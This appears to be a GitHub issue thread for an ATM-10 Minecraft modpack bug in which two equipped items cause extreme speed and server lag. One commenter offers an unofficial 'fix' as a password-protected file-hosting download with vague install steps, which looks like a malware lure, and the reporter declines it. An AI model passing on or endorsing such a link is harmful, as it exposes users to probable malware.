### ISSUE TITLE
[Bug]: Speed increase a lot with Helium flamingo (Artefacts) + Roiller Skates (Relics)

### ISSUE THREAD

**Issue by JeremyAmours** [AllTheMods/ATM-10#384]
### Possible Fixes

Yes

### Modpack Version

10-0.52

### What happened?

Hello, I found that the re is a big bug about the Helium flamingo (Artefacts) + Roiller Skates (Relics). 
If you equipe them at the same time and use the Helium Flamingo, the speed increase a lot. 
This speed can make the server lag/freeze (as you can see on the medal video).
On the video, I go for 1 000 blocs in seconds (sorry for the HDR).

https://medal.tv/fr/games/minecraft/clips/iATb2ndmFvibMQdKS/d1337wUToxUp?invite=cr-MSwwdGMsMzM3OTM2Mjcs

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by JeremyAmours** [comment]
Hello, 

Thanks for your reply. I'll not install a random file. I'll wait for an official update. 

Thanks
